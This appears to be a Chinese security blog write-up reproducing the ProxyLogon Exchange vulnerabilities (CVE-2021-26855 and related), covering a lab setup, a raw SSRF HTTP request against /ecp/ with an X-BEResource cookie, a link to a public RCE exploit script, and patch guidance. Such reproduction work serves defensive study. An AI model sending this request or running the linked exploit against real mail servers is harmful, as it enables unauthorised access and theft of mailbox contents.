CVE-2021-26855:Exchange SSRF致RCE复现

  • A+
所属分类:安全文章

上方蓝色字体关注我们,一起学安全!
作者:daxi0ng@Timeline Sec
本文字数:1909
阅读时长:6~8min
作者博客:daxi0ng.com
声明:请勿用作违法用途,否则后果自负


0x01 简介

Exchange Server是微软公司的是一套电子邮件服务组件,是个消息与协作系统,主要提供包括从电子邮件、会议安排、团体日程管理、任务管理、文档管理、实时会议和工作流等协作应用。


0x02 漏洞概述

编号:CVE-2021-26855

该漏洞是Exchange中的服务端请求伪造漏洞(SSRF),利用此漏洞的攻击者能够发送任意HTTP请求并绕过Exchange Server身份验证,远程未授权的攻击者可以利用该漏洞以进行内网探测,并可以用于窃取用户邮箱的全部内容。

危害:该漏洞是Exchange中的服务端请求伪造漏洞(SSRF),利用此漏洞的攻击者能够发送任意HTTP请求并绕过Exchange Server身份验证,远程未授权的攻击者可以利用该漏洞以进行内网探测,并可以用于窃取用户邮箱的全部内容。


编号:CVE-2021-26857

该漏洞是Unified Messaging 服务中的不安全的反序列化漏洞。利用该漏洞,攻击者可以发送精心构造的恶意请求,从而在Exchange Server上以SYSTEM身份执行任意代码。

危害:该漏洞是Unified Messaging 服务中的不安全的反序列化漏洞。利用该漏洞,攻击者可以发送精心构造的恶意请求,从而在Exchange Server上以SYSTEM身份执行任意代码。


编号:CVE-2021-26858

该漏洞是Exchange中的任意文件写入漏洞。该漏洞需要进行身份认证,利用此漏洞可以将文件写入服务器上的任何路径。并可以结合利用CVE-2021-26855 SSRF漏洞或绕过权限认证进行文件写入。

危害:该漏洞是Exchange中的任意文件写入漏洞。该漏洞需要进行身份认证,利用此漏洞可以将文件写入服务器上的任何路径。并可以结合利用CVE-2021-26855 SSRF漏洞或绕过权限认证进行文件写入。


编号:CVE-2021-27065

该漏洞是Exchange中的任意文件写入漏洞。该漏洞需要进行身份认证,利用此漏洞可以将文件写入服务器上的任何路径。并可以结合利用CVE-2021-26855 SSRF漏洞或绕过权限认证进行文件写入。

危害:该漏洞是Exchange中的任意文件写入漏洞。该漏洞需要进行身份认证,利用此漏洞可以将文件写入服务器上的任何路径。并可以结合利用CVE-2021-26855 SSRF漏洞或绕过权限认证进行文件写入。


0x03 影响版本
Microsoft Exchange 2013
Microsoft Exchange 2016 (此次使用的是CU18版本)
Microsoft Exchange 2019
Microsoft Exchange 2010


0x04 环境搭建
一、安装AD域控

1、我使用的是windows server 2016,点击管理>添加角色和功能向导,选择Active Directory 域服务 和 DNS 服务器

CVE-2021-26855:Exchange SSRF致RCE复现

CVE-2021-26855:Exchange SSRF致RCE复现

2、一路点击下一步到安装

CVE-2021-26855:Exchange SSRF致RCE复现

3、点击"将此服务器提升为域控制器",这里选择添加新林,然后给自己主机定义一个内部域名,最好和外部域名称不同。我这里设置的是ex.com

CVE-2021-26855:Exchange SSRF致RCE复现

4、设置密码

CVE-2021-26855:Exchange SSRF致RCE复现

5、点击下一步,显示无法创建DNS服务器委派,无视,下一步

CVE-2021-26855:Exchange SSRF致RCE复现

6、选择安装的位置以及日志文件位置

CVE-2021-26855:Exchange SSRF致RCE复现

CVE-2021-26855:Exchange SSRF致RCE复现

CVE-2021-26855:Exchange SSRF致RCE复现

7、如果提示
域控制器升级的先决条件验证失败。新建域时,本地 Administrator 帐户将成为域 Administrator 帐户。无法新建域,因为本地 Administrator 帐户密码不符合要求。

目前,本地 Administrator 密码为空白,这可能会导致安全问题。

可参考:
https://blog.csdn.net/qq_41863998/article/details/103562080

8、安装完成后自动重启即完成

CVE-2021-26855:Exchange SSRF致RCE复现

二、安装 Exchange Server 2016
然后下载Exchange
https://www.microsoft.com/zh-cn/download/confirmation.aspx?id=102114

然后下载.NET4.8

https://docs.microsoft.com/zh-cn/exchange/plan-and-deploy/prerequisites?view=exchserver-2016

下载C++ 依赖包

https://www.microsoft.com/en-us/download/details.aspx?id=30679

2、开始安装,选择不更新

CVE-2021-26855:Exchange SSRF致RCE复现

CVE-2021-26855:Exchange SSRF致RCE复现

CVE-2021-26855:Exchange SSRF致RCE复现

CVE-2021-26855:Exchange SSRF致RCE复现
CVE-2021-26855:Exchange SSRF致RCE复现

CVE-2021-26855:Exchange SSRF致RCE复现

CVE-2021-26855:Exchange SSRF致RCE复现

3、启用exchange自带的杀毒

CVE-2021-26855:Exchange SSRF致RCE复现

4、配置先决条件出错。主要问题是"需要对 Active Directory 进行全局更新,并且此用户帐户不是 'Enterprise Admins' 组的成员。"

我把user用户和administrator添加到要求的组里然后,切换用户到administrator试了试安装就可以了。

CVE-2021-26855:Exchange SSRF致RCE复现
CVE-2021-26855:Exchange SSRF致RCE复现

5、安装

CVE-2021-26855:Exchange SSRF致RCE复现

6、安装成功后访问https://localhost/ecp
即可到达exchange管理中心

CVE-2021-26855:Exchange SSRF致RCE复现

7、使用域名用户名,密码即可登录管理中心

CVE-2021-26855:Exchange SSRF致RCE复现

CVE-2021-26855:Exchange SSRF致RCE复现


0x05 漏洞复现
1、尝试 CVE-2021-26855 SSRF漏洞

CVE-2021-26855:Exchange SSRF致RCE复现

POST /ecp/fewi.js HTTP/1.1Host: ex.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeCookie: X-BEResource=WIN-UNQPITL7FNS(此处是你的目标主机名)/autodiscover/autodiscover.xml?a=~1942062522;Content-Type: text/xmlContent-Length: 415              <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">                <Request>                <EMailAddress>[email protected](此处是目标存在的一个邮箱地址)</EMailAddress>                <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>                </Request>            </Autodiscover>


2、执行exp
exp地址:
https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Exchange/CVE-2021-26855 Exchange RCE/exp.py

CVE-2021-26855:Exchange SSRF致RCE复现


0x06 修复方式


1、微软官方已经发布了解决上述漏洞的安全更新,建议受影响用户尽快升级到安全版本,官方安全版本下载可以参考以下链接:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065


2、若无法及时进行升级,建议采用官方的临时措施进行防御:
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/


参考链接:
https://www.o2oxy.cn/3169.html
https://blog.csdn.net/zhaowei198311/article/details/107391577


CVE-2021-26855:Exchange SSRF致RCE复现

CVE-2021-26855:Exchange SSRF致RCE复现
阅读原文看更多复现文章
Timeline Sec 团队
安全路上,与你并肩前行




本文始发于微信公众号(Timeline Sec):CVE-2021-26855:Exchange SSRF致RCE复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: